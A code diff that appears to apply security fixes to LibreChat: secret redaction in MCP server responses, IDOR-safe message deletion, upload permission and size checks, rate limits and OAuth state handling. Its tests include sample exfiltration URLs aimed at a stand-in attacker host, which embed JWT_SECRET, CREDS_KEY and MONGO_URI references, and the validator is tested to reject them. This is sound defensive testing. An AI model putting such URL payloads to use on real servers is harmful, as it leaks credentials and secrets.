expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith( expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith(
'test-server', 'test-server',
'test-user-id', 'test-user-id',
@ -1743,6 +1951,29 @@ describe('MCP Routes', () => {
expect(response.body).toEqual({ message: 'MCP server not found' }); expect(response.body).toEqual({ message: 'MCP server not found' });
}); });
it('should redact secrets from get response', async () => {
mockRegistryInstance.getServerConfig.mockResolvedValue({
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Secret Server',
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' },
oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
oauth_headers: { 'X-OAuth': 'secret-value' },
});
const response = await request(app).get('/api/mcp/servers/secret-server');
expect(response.status).toBe(200);
expect(response.body.title).toBe('Secret Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.oauth_headers).toBeUndefined();
});
it('should return 500 when registry throws error', async () => { it('should return 500 when registry throws error', async () => {
mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error')); mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error'));
@ -1769,7 +2000,9 @@ describe('MCP Routes', () => {
.send({ config: updatedConfig }); .send({ config: updatedConfig });
expect(response.status).toBe(200); expect(response.status).toBe(200);
expect(response.body).toEqual(updatedConfig); expect(response.body.type).toBe('sse');
expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse');
expect(response.body.title).toBe('Updated Server');
expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith( expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith(
'test-server', 'test-server',
expect.objectContaining({ expect.objectContaining({
@ -1781,6 +2014,35 @@ describe('MCP Routes', () => {
); );
}); });
it('should redact secrets from update response', async () => {
const validConfig = {
type: 'sse',
url: 'https://mcp-server.example.com/sse',
title: 'Updated Server',
};
mockRegistryInstance.updateServer.mockResolvedValue({
...validConfig,
apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' },
oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' },
headers: { Authorization: 'Bearer internal-token' },
env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' },
});
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({ config: validConfig });
expect(response.status).toBe(200);
expect(response.body.title).toBe('Updated Server');
expect(response.body.apiKey?.key).toBeUndefined();
expect(response.body.apiKey?.source).toBe('admin');
expect(response.body.oauth?.client_secret).toBeUndefined();
expect(response.body.oauth?.client_id).toBe('cid');
expect(response.body.headers).toBeUndefined();
expect(response.body.env).toBeUndefined();
});
it('should return 400 for invalid configuration', async () => { it('should return 400 for invalid configuration', async () => {
const invalidConfig = { const invalidConfig = {
type: 'sse', type: 'sse',
@ -1797,6 +2059,51 @@ describe('MCP Routes', () => {
expect(response.body.errors).toBeDefined(); expect(response.body.errors).toBeDefined();
}); });
it('should reject SSE URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'sse',
url: 'http://attacker.com/?secret=${JWT_SECRET}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject streamable-http URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'streamable-http',
url: 'http://attacker.com/?key=${CREDS_KEY}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should reject websocket URL containing env variable references', async () => {
const response = await request(app)
.patch('/api/mcp/servers/test-server')
.send({
config: {
type: 'websocket',
url: 'ws://attacker.com/?secret=${MONGO_URI}',
},
});
expect(response.status).toBe(400);
expect(response.body.message).toBe('Invalid configuration');
expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled();
});
it('should return 500 when registry throws error', async () => { it('should return 500 when registry throws error', async () => {
const validConfig = { const validConfig = {
type: 'sse', type: 'sse',

View file

@ -0,0 +1,200 @@
const mongoose = require('mongoose');
const express = require('express');
const request = require('supertest');
const { v4: uuidv4 } = require('uuid');
const { MongoMemoryServer } = require('mongodb-memory-server');
jest.mock('@librechat/agents', () => ({
sleep: jest.fn(),
}));
jest.mock('@librechat/api', () => ({
unescapeLaTeX: jest.fn((x) => x),
countTokens: jest.fn().mockResolvedValue(10),
}));
jest.mock('@librechat/data-schemas', () => ({
...jest.requireActual('@librechat/data-schemas'),
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
}));
jest.mock('~/models', () => ({
saveConvo: jest.fn(),
getMessage: jest.fn(),
saveMessage: jest.fn(),
getMessages: jest.fn(),
updateMessage: jest.fn(),
deleteMessages: jest.fn(),
}));
jest.mock('~/server/services/Artifacts/update', () => ({
findAllArtifacts: jest.fn(),
replaceArtifactContent: jest.fn(),
}));
jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next());
jest.mock('~/server/middleware', () => ({
requireJwtAuth: (req, res, next) => next(),
validateMessageReq: (req, res, next) => next(),
}));
jest.mock('~/models/Conversation', () => ({
getConvosQueried: jest.fn(),
}));
jest.mock('~/db/models', () => ({
Message: {
findOne: jest.fn(),
find: jest.fn(),
meiliSearch: jest.fn(),
},
}));
/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */
const { messageSchema } = require('@librechat/data-schemas');
describe('deleteMessages model-level IDOR prevention', () => {
let mongoServer;
let Message;
const ownerUserId = 'user-owner-111';
const attackerUserId = 'user-attacker-222';
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
Message = mongoose.models.Message || mongoose.model('Message', messageSchema);
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Message.deleteMany({});
});
it("should NOT delete another user's message when attacker supplies victim messageId", async () => {
const conversationId = uuidv4();
const victimMsgId = 'victim-msg-001';
await Message.create({
messageId: victimMsgId,
conversationId,
user: ownerUserId,
text: 'Sensitive owner data',
});
await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId });
const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean();
expect(victimMsg).not.toBeNull();
expect(victimMsg.user).toBe(ownerUserId);
expect(victimMsg.text).toBe('Sensitive owner data');
});
it("should delete the user's own message", async () => {
const conversationId = uuidv4();
const ownMsgId = 'own-msg-001';
await Message.create({
messageId: ownMsgId,
conversationId,
user: ownerUserId,
text: 'My message',
});
const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId });
expect(result.deletedCount).toBe(1);
const deleted = await Message.findOne({ messageId: ownMsgId }).lean();
expect(deleted).toBeNull();
});
it('should scope deletion by conversationId, messageId, and user together', async () => {
const convoA = uuidv4();
const convoB = uuidv4();
await Message.create([
{ messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' },
{ messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' },
]);
await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId });
const remaining = await Message.find({ user: ownerUserId }).lean();
expect(remaining).toHaveLength(2);
});
});
/* ─── Route-level tests: supertest + mocked deleteMessages ─── */
describe('DELETE /:conversationId/:messageId route handler', () => {
let app;
const { deleteMessages } = require('~/models');
const authenticatedUserId = 'user-owner-123';
beforeAll(() => {
const messagesRouter = require('../messages');
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: authenticatedUserId };
next();
});
app.use('/api/messages', messagesRouter);
});
beforeEach(() => {
jest.clearAllMocks();
});
it('should pass user and conversationId in the deleteMessages filter', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
await request(app).delete('/api/messages/convo-1/msg-1');
expect(deleteMessages).toHaveBeenCalledTimes(1);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-1',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 204 on successful deletion', async () => {
deleteMessages.mockResolvedValue({ deletedCount: 1 });
const response = await request(app).delete('/api/messages/convo-1/msg-owned');
expect(response.status).toBe(204);
expect(deleteMessages).toHaveBeenCalledWith({
messageId: 'msg-owned',
conversationId: 'convo-1',
user: authenticatedUserId,
});
});
it('should return 500 when deleteMessages throws', async () => {
deleteMessages.mockRejectedValue(new Error('DB failure'));
const response = await request(app).delete('/api/messages/convo-1/msg-1');
expect(response.status).toBe(500);
expect(response.body).toEqual({ error: 'Internal server error' });
});
});

View file

@ -63,7 +63,7 @@ router.post(
resetPasswordController, resetPasswordController,
); );
router.get('/2fa/enable', middleware.requireJwtAuth, enable2FA); router.post('/2fa/enable', middleware.requireJwtAuth, enable2FA);
router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA); router.post('/2fa/verify', middleware.requireJwtAuth, verify2FA);
router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken); router.post('/2fa/verify-temp', middleware.checkBan, verify2FAWithTempToken);
router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA); router.post('/2fa/confirm', middleware.requireJwtAuth, confirm2FA);

View file

@ -1,7 +1,7 @@
const multer = require('multer'); const multer = require('multer');
const express = require('express'); const express = require('express');
const { sleep } = require('@librechat/agents'); const { sleep } = require('@librechat/agents');
const { isEnabled } = require('@librechat/api'); const { isEnabled, resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { CacheKeys, EModelEndpoint } = require('librechat-data-provider'); const { CacheKeys, EModelEndpoint } = require('librechat-data-provider');
const { const {
@ -224,8 +224,27 @@ router.post('/update', validateConvoAccess, async (req, res) => {
}); });
const { importIpLimiter, importUserLimiter } = createImportLimiters(); const { importIpLimiter, importUserLimiter } = createImportLimiters();
/** Fork and duplicate share one rate-limit budget (same "clone" operation class) */
const { forkIpLimiter, forkUserLimiter } = createForkLimiters(); const { forkIpLimiter, forkUserLimiter } = createForkLimiters();
const upload = multer({ storage: storage, fileFilter: importFileFilter }); const importMaxFileSize = resolveImportMaxFileSize();
const upload = multer({
storage,
fileFilter: importFileFilter,
limits: { fileSize: importMaxFileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
/** /**
* Imports a conversation from a JSON file and saves it to the database. * Imports a conversation from a JSON file and saves it to the database.
@ -238,7 +257,7 @@ router.post(
importIpLimiter, importIpLimiter,
importUserLimiter, importUserLimiter,
configMiddleware, configMiddleware,
upload.single('file'), handleUpload,
async (req, res) => { async (req, res) => {
try { try {
/* TODO: optimize to return imported conversations and add manually */ /* TODO: optimize to return imported conversations and add manually */
@ -280,7 +299,7 @@ router.post('/fork', forkIpLimiter, forkUserLimiter, async (req, res) => {
} }
}); });
router.post('/duplicate', async (req, res) => { router.post('/duplicate', forkIpLimiter, forkUserLimiter, async (req, res) => {
const { conversationId, title } = req.body; const { conversationId, title } = req.body;
try { try {

View file

@ -2,12 +2,12 @@ const fs = require('fs').promises;
const express = require('express'); const express = require('express');
const { EnvVar } = require('@librechat/agents'); const { EnvVar } = require('@librechat/agents');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { verifyAgentUploadPermission } = require('@librechat/api');
const { const {
Time, Time,
isUUID, isUUID,
CacheKeys, CacheKeys,
FileSources, FileSources,
SystemRoles,
ResourceType, ResourceType,
EModelEndpoint, EModelEndpoint,
PermissionBits, PermissionBits,
@ -381,48 +381,15 @@ router.post('/', async (req, res) => {
return await processFileUpload({ req, res, metadata }); return await processFileUpload({ req, res, metadata });
} }
/** const denied = await verifyAgentUploadPermission({
* Check agent permissions for permanent agent file uploads (not message attachments). req,
* Message attachments (message_file=true) are temporary files for a single conversation res,
* and should be allowed for users who can chat with the agent. metadata,
* Permanent file uploads to tool_resources require EDIT permission. getAgent,
*/ checkPermission,
const isMessageAttachment = metadata.message_file === true || metadata.message_file === 'true';
if (metadata.agent_id && metadata.tool_resource && !isMessageAttachment) {
const userId = req.user.id;
/** Admin users bypass permission checks */
if (req.user.role !== SystemRoles.ADMIN) {
const agent = await getAgent({ id: metadata.agent_id });
if (!agent) {
return res.status(404).json({
error: 'Not Found',
message: 'Agent not found',
}); });
} if (denied) {
return;
/** Check if user is the author or has edit permission */
if (agent.author.toString() !== userId) {
const hasEditPermission = await checkPermission({
userId,
role: req.user.role,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission: PermissionBits.EDIT,
});
if (!hasEditPermission) {
logger.warn(
`[/files] User ${userId} denied upload to agent ${metadata.agent_id} (insufficient permissions)`,
);
return res.status(403).json({
error: 'Forbidden',
message: 'Insufficient permissions to upload files to this agent',
});
}
}
}
} }
return await processAgentFileUpload({ req, res, metadata }); return await processAgentFileUpload({ req, res, metadata });

View file

@ -0,0 +1,376 @@
const express = require('express');
const request = require('supertest');
const mongoose = require('mongoose');
const { v4: uuidv4 } = require('uuid');
const { createMethods } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const {
SystemRoles,
AccessRoleIds,
ResourceType,
PrincipalType,
} = require('librechat-data-provider');
const { createAgent } = require('~/models/Agent');
jest.mock('~/server/services/Files/process', () => ({
processAgentFileUpload: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Agent file uploaded', file_id: 'test-file-id' });
}),
processImageFile: jest.fn().mockImplementation(async ({ res }) => {
return res.status(200).json({ message: 'Image processed' });
}),
filterFile: jest.fn(),
}));
jest.mock('fs', () => {
const actualFs = jest.requireActual('fs');
return {
...actualFs,
promises: {
...actualFs.promises,
unlink: jest.fn().mockResolvedValue(undefined),
},
};
});
const fs = require('fs');
const { processAgentFileUpload } = require('~/server/services/Files/process');
const router = require('~/server/routes/files/images');
describe('POST /images - Agent Upload Permission Check (Integration)', () => {
let mongoServer;
let authorId;
let otherUserId;
let agentCustomId;
let User;
let Agent;
let AclEntry;
let methods;
let modelsToCleanup = [];
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
await mongoose.connect(mongoUri);
const { createModels } = require('@librechat/data-schemas');
const models = createModels(mongoose);
modelsToCleanup = Object.keys(models);
Object.assign(mongoose.models, models);
methods = createMethods(mongoose);
User = models.User;
Agent = models.Agent;
AclEntry = models.AclEntry;
await methods.seedDefaultRoles();
});
afterAll(async () => {
const collections = mongoose.connection.collections;
for (const key in collections) {
await collections[key].deleteMany({});
}
for (const modelName of modelsToCleanup) {
if (mongoose.models[modelName]) {
delete mongoose.models[modelName];
}
}
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Agent.deleteMany({});
await User.deleteMany({});
await AclEntry.deleteMany({});
authorId = new mongoose.Types.ObjectId();
otherUserId = new mongoose.Types.ObjectId();
agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`;
await User.create({ _id: authorId, username: 'author', email: 'author@test.com' });
await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' });
jest.clearAllMocks();
});
const createAppWithUser = (userId, userRole = SystemRoles.USER) => {
const app = express();
app.use(express.json());
app.use((req, _res, next) => {
if (req.method === 'POST') {
req.file = {
originalname: 'test.png',
mimetype: 'image/png',
size: 100,
path: '/tmp/t.png',
filename: 'test.png',
};
req.file_id = uuidv4();
}
next();
});
app.use((req, _res, next) => {
req.user = { id: userId.toString(), role: userRole };
req.app = { locals: {} };
req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } };
next();
});
app.use('/images', router);
return app;
};
it('should return 403 when user has no permission on agent', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow upload for agent owner', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(authorId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for admin regardless of ownership', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId, SystemRoles.ADMIN);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for user with EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_EDITOR,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload for user with only VIEW permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
});
it('should return 404 for non-existent agent', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: 'agent_nonexistent123456789',
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(404);
expect(response.body.error).toBe('Not Found');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow message_file attachment (boolean true) without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: true,
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow message_file attachment (string "true") without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: 'true',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload when message_file is false (not a message attachment)', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: false,
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
});

View file

@ -2,12 +2,15 @@ const path = require('path');
const fs = require('fs').promises; const fs = require('fs').promises;
const express = require('express'); const express = require('express');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { verifyAgentUploadPermission } = require('@librechat/api');
const { isAssistantsEndpoint } = require('librechat-data-provider'); const { isAssistantsEndpoint } = require('librechat-data-provider');
const { const {
processAgentFileUpload, processAgentFileUpload,
processImageFile, processImageFile,
filterFile, filterFile,
} = require('~/server/services/Files/process'); } = require('~/server/services/Files/process');
const { checkPermission } = require('~/server/services/PermissionService');
const { getAgent } = require('~/models/Agent');
const router = express.Router(); const router = express.Router();
@ -22,6 +25,16 @@ router.post('/', async (req, res) => {
metadata.file_id = req.file_id; metadata.file_id = req.file_id;
if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) { if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) {
const denied = await verifyAgentUploadPermission({
req,
res,
metadata,
getAgent,
checkPermission,
});
if (denied) {
return;
}
return await processAgentFileUpload({ req, res, metadata }); return await processAgentFileUpload({ req, res, metadata });
} }

View file

@ -13,6 +13,7 @@ const {
MCPOAuthHandler, MCPOAuthHandler,
MCPTokenStorage, MCPTokenStorage,
setOAuthSession, setOAuthSession,
PENDING_STALE_MS,
getUserMCPAuthMap, getUserMCPAuthMap,
validateOAuthCsrf, validateOAuthCsrf,
OAUTH_CSRF_COOKIE, OAUTH_CSRF_COOKIE,
@ -49,6 +50,18 @@ const router = Router();
const OAUTH_CSRF_COOKIE_PATH = '/api/mcp'; const OAUTH_CSRF_COOKIE_PATH = '/api/mcp';
const checkMCPUsePermissions = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE],
getRoleByName,
});
const checkMCPCreate = generateCheckAccess({
permissionType: PermissionTypes.MCP_SERVERS,
permissions: [Permissions.USE, Permissions.CREATE],
getRoleByName,
});
/** /**
* Get all MCP tools available to the user * Get all MCP tools available to the user
* Returns only MCP tools, completely decoupled from regular LibreChat tools * Returns only MCP tools, completely decoupled from regular LibreChat tools
@ -91,7 +104,11 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
} }
const oauthHeaders = await getOAuthHeaders(serverName, userId); const oauthHeaders = await getOAuthHeaders(serverName, userId);
const { authorizationUrl, flowId: oauthFlowId } = await MCPOAuthHandler.initiateOAuthFlow( const {
authorizationUrl,
flowId: oauthFlowId,
flowMetadata,
} = await MCPOAuthHandler.initiateOAuthFlow(
serverName, serverName,
serverUrl, serverUrl,
userId, userId,
@ -101,6 +118,7 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl }); logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl });
await MCPOAuthHandler.storeStateMapping(flowMetadata.state, oauthFlowId, flowManager);
setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH); setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH);
res.redirect(authorizationUrl); res.redirect(authorizationUrl);
} catch (error) { } catch (error) {
@ -143,31 +161,53 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
return res.redirect(`${basePath}/oauth/error?error=missing_state`); return res.redirect(`${basePath}/oauth/error?error=missing_state`);
} }
const flowId = state; const flowsCache = getLogStores(CacheKeys.FLOWS);
logger.debug('[MCP OAuth] Using flow ID from state', { flowId }); const flowManager = getFlowStateManager(flowsCache);
const flowId = await MCPOAuthHandler.resolveStateToFlowId(state, flowManager);
if (!flowId) {
logger.error('[MCP OAuth] Could not resolve state to flow ID', { state });
return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
}
logger.debug('[MCP OAuth] Resolved flow ID from state', { flowId });
const flowParts = flowId.split(':'); const flowParts = flowId.split(':');
if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) { if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) {
logger.error('[MCP OAuth] Invalid flow ID format in state', { flowId }); logger.error('[MCP OAuth] Invalid flow ID format', { flowId });
return res.redirect(`${basePath}/oauth/error?error=invalid_state`); return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
} }
const [flowUserId] = flowParts; const [flowUserId] = flowParts;
if (
!validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH) && const hasCsrf = validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH);
!validateOAuthSession(req, flowUserId) const hasSession = !hasCsrf && validateOAuthSession(req, flowUserId);
) { let hasActiveFlow = false;
logger.error('[MCP OAuth] CSRF validation failed: no valid CSRF or session cookie', { if (!hasCsrf && !hasSession) {
const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
hasActiveFlow = pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS;
if (hasActiveFlow) {
logger.debug(
'[MCP OAuth] CSRF/session cookies absent, validating via active PENDING flow',
{
flowId,
},
);
}
}
if (!hasCsrf && !hasSession && !hasActiveFlow) {
logger.error(
'[MCP OAuth] CSRF validation failed: no valid CSRF cookie, session cookie, or active flow',
{
flowId, flowId,
hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE], hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE], hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
}); },
);
return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`); return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
} }
const flowsCache = getLogStores(CacheKeys.FLOWS);
const flowManager = getFlowStateManager(flowsCache);
logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId); logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId);
const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager); const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager);
@ -281,7 +321,13 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
const toolFlowId = flowState.metadata?.toolFlowId; const toolFlowId = flowState.metadata?.toolFlowId;
if (toolFlowId) { if (toolFlowId) {
logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId }); logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId });
await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens); const completed = await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
if (!completed) {
logger.warn(
'[MCP OAuth] Tool flow state not found during completion — waiter will time out',
{ toolFlowId },
);
}
} }
/** Redirect to success page with flowId and serverName */ /** Redirect to success page with flowId and serverName */
@ -436,7 +482,12 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => {
* Reinitialize MCP server * Reinitialize MCP server
* This endpoint allows reinitializing a specific MCP server * This endpoint allows reinitializing a specific MCP server
*/ */
router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => { router.post(
'/:serverName/reinitialize',
requireJwtAuth,
checkMCPUsePermissions,
setOAuthSession,
async (req, res) => {
try { try {
const { serverName } = req.params; const { serverName } = req.params;
const user = createSafeUser(req.user); const user = createSafeUser(req.user);
@ -498,7 +549,8 @@ router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async
logger.error('[MCP Reinitialize] Unexpected error', error); logger.error('[MCP Reinitialize] Unexpected error', error);
res.status(500).json({ error: 'Internal server error' }); res.status(500).json({ error: 'Internal server error' });
} }
}); },
);
/** /**
* Get connection status for all MCP servers * Get connection status for all MCP servers
@ -605,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) =>
* Check which authentication values exist for a specific MCP server * Check which authentication values exist for a specific MCP server
* This endpoint returns only boolean flags indicating if values are set, not the actual values * This endpoint returns only boolean flags indicating if values are set, not the actual values
*/ */
